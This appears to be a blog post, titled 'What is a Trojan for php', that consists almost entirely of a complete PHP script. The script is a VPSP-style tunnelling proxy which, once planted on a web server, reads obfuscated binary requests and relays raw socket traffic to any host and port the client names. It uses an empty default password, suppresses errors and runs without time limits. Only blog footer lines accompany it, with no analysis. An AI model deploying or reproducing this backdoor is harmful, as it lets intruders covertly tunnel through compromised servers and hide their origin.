<?php
$GLOBALS['vpsp_pe'] = array(92, 115, 147, 51, 91, 142, 10, 4, 66, 136, 44, 247, 48, 161, 5, 74, 38, 90, 83, 96, 254, 148, 67, 221, 169, 239, 223, 100, 17, 112, 144, 182, 71, 101, 218, 145, 132, 127, 176, 135, 190, 16, 130, 9, 98, 55, 76, 99, 49, 173, 18, 104, 120, 154, 77, 107, 193, 215, 157, 231, 200, 113, 155, 116, 19, 105, 126, 206, 14, 252, 69, 164, 64, 35, 47, 15, 46, 168, 197, 31, 86, 196, 32, 36, 7, 159, 165, 129, 22, 24, 60, 222, 177, 40, 149, 23, 72, 227, 138, 59, 238, 34, 184, 102, 220, 25, 131, 152, 26, 1, 81, 133, 134, 188, 108, 253, 0, 68, 110, 208, 160, 255, 248, 63, 234, 114, 228, 57, 204, 94, 21, 175, 186, 89, 232, 219, 183, 78, 42, 8, 212, 12, 251, 201, 140, 27, 194, 158, 180, 236, 53, 29, 61, 58, 84, 2, 143, 245, 244, 43, 39, 162, 198, 103, 3, 37, 123, 207, 216, 52, 139, 163, 109, 156, 6, 87, 151, 235, 119, 153, 45, 106, 241, 214, 95, 141, 195, 211, 62, 250, 229, 246, 243, 203, 237, 192, 88, 233, 125, 146, 75, 117, 30, 20, 185, 171, 41, 121, 80, 167, 54, 209, 240, 210, 189, 124, 174, 242, 205, 128, 50, 93, 217, 181, 111, 118, 85, 73, 172, 28, 226, 249, 13, 82, 225, 79, 65, 230, 224, 11, 166, 33, 137, 179, 70, 122, 178, 199, 97, 202, 191, 56, 150, 187, 170, 213);
define('vpsp_version', '2.5.0');
define('vpsp_pwd', '');
error_reporting(~E_ALL);
@set_time_limit(0);
ob_implicit_flush(1);
ignore_user_abort(0);
header('Content-type: application/octet-stream');
header('Content-Transfer-Encoding: binary');
header('X-VPSP-VERSION: ' . vpsp_version);
$input = fopen('php://input', 'r');
define('vpsp_enc', ord(fread($input, 1)) != 0);
$ok;
if (vpsp_enc) {
if (isset($GLOBALS['vpsp_pe']) == false) {
$GLOBALS['vpsp_ks'] = VC_GenerateKeyHash(vpsp_enc_key);
$GLOBALS['vpsp_pe'] = VC_Init(vpsp_enc_key, $GLOBALS['vpsp_ks']);
}
$GLOBALS['vpsp_pd'] = array_flip($GLOBALS['vpsp_pe']);
$ok = VC_Decrypt(fread($input, 2));
if ($ok != 'OK') {
header('X-VPSP-ERROR: bad_enc_key');
header('X-VPSP-HOST: ' . (isset($_SERVER['HTTPS']) ? 'https://' : 'http://') . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
exit;
}
$rBuffLen = ord(VC_Decrypt(fread($input, 1))) * 256 * 256 * 256 + ord(VC_Decrypt(fread($input, 1))) * 256 * 256 + ord(VC_Decrypt(fread($input, 1))) * 256 + ord(VC_Decrypt(fread($input, 1)));
$sBuffLen = ord(VC_Decrypt(fread($input, 1))) * 256 * 256 * 256 + ord(VC_Decrypt(fread($input, 1))) * 256 * 256 + ord(VC_Decrypt(fread($input, 1))) * 256 + ord(VC_Decrypt(fread($input, 1)));
$reqPwdLen = ord(VC_Decrypt(fread($input, 1)));
$reqPwd = ($reqPwdLen > 0) ? VC_Decrypt(fread($input, $reqPwdLen)) : '';
$https = ord(VC_Decrypt(fread($input, 1)));
$host = VC_Decrypt(fread($input, ord(VC_Decrypt(fread($input, 1)))));
$port = ord(VC_Decrypt(fread($input, 1))) * 256 + ord(VC_Decrypt(fread($input, 1)));
} else {
$ok = fread($input, 2);
if ($ok != 'OK') {
header('X-VPSP-ERROR: bad_request');
header('X-VPSP-HOST: ' . (isset($_SERVER['HTTPS']) ? 'https://' : 'http://') . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
exit;
}
$rBuffLen = ord(fread($input, 1)) * 256 * 256 * 256 + ord(fread($input, 1)) * 256 * 256 + ord(fread($input, 1)) * 256 + ord(fread($input, 1));
$sBuffLen = ord(fread($input, 1)) * 256 * 256 * 256 + ord(fread($input, 1)) * 256 * 256 + ord(fread($input, 1)) * 256 + ord(fread($input, 1));
$reqPwdLen = ord(fread($input, 1));
$reqPwd = ($reqPwdLen > 0) ? fread($input, $reqPwdLen) : '';
$https = ord(fread($input, 1));
$host = fread($input, ord(fread($input, 1)));
$port = ord(fread($input, 1)) * 256 + ord(fread($input, 1));
}
if ($reqPwd !== vpsp_pwd) {
$resp = "HTTP/1.0 401 Unauthorized\r\nX-VPSP-VERSION: " . vpsp_version . "\r\nX-VPSP-ERROR: bad_password\r\nX-VPSP-HOST: " . (isset($_SERVER['HTTPS']) ? 'https://' : 'http://') . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'] . "\r\nConnection: close\r\n\r\n";
if (vpsp_enc) {
echo VC_Encrypt($resp);
} else {
echo $resp;
}
exit;
}
if ($https == 1) {
$host = 'ssl://' . $host;
}
$fsok = fsockopen($host, $port, $errno, $errstr, 20);
if ($fsok == false) {
$resp = "HTTP/1.0 503 Service Unavailable\r\nX-VPSP-VERSION: " . vpsp_version . "\r\nX-VPSP-ERROR: host_down\r\nX-VPSP-ERROR-TEXT: " . base64_encode($errstr) ."\r\nX-VPSP-HOST: " . (isset($_SERVER['HTTPS']) ? 'https://' : 'http://') . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'] . "\r\nX-VPSP-TARGET: " . str_replace('ssl://', '', $host) . "\r\nConnection: close\r\n\r\n";
if (vpsp_enc) {
echo VC_Encrypt($resp);
} else {
echo $resp;
}
exit;
}
while ($wbuffer = fread($input, $rBuffLen)) {
if (vpsp_enc) {
fwrite($fsok, VC_Decrypt($wbuffer));
} else {
fwrite($fsok, $wbuffer);
}
}
fflush($fsok);
while ($rbuffer = fread($fsok, $sBuffLen)) {
if (vpsp_enc) {
echo VC_Encrypt($rbuffer);
} else {
echo $rbuffer;
}
}
fflush($fsok);
fclose($fsok);
function MD5Hash($str) {
$m = md5($str);
$s = '';
foreach(explode("\n", trim(chunk_split($m, 2))) as $h) {
$s .= chr(hexdec($h));
}
return $s;
}
function VC_Init($key, $ks) {
$s = range(0, 255);
if (strlen($key) == 0) {
return $s;
}
$km = MD5Hash($key);
$kx = '';
for ($i = 0; $i < 16; $i++) {
$kx .= MD5Hash($km . $km[$i] . chr($ks));
}
$r = ($ks % 0x0F) + 1;
$j = $ks;
for ($n = 0; $n < $r; $n++) {
for ($i = 0; $i < 256; $i++) {
$j = (($j + $s[$i] + $n + ord($kx[$i])) ^ $ks) % 256;
$t = $s[$i];
$s[$i] = $s[$j];
$s[$j] = $t;
}
}
for ($i = 0; $i < 256; $i++) {
$s[$i] = $s[$i] ^ $ks;
}
return $s;
}
function VC_GenerateKeyHash($key) {
$m = MD5Hash($key);
$kt = 0;
for ($i = 0; $i < 16; $i++) {
$kt += ord($m[$i]);
}
return $kt % 256;
}
function VC_Encrypt($str) {
$pe = $GLOBALS['vpsp_pe'];
$out = '';
$len = strlen($str);
for ($y = 0; $y < $len; $y++) {
$out .= chr($pe[ord($str[$y])]);
}
return $out;
}
function VC_Decrypt($str) {
$pd = $GLOBALS['vpsp_pd'];
$out = '';
$len = strlen($str);
for ($y = 0; $y < $len; $y++) {
$out .= chr($pd[ord($str[$y])]);
}
return $out;
}
?>
Saturday, January 7, 2012
What is a Trojan for php
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment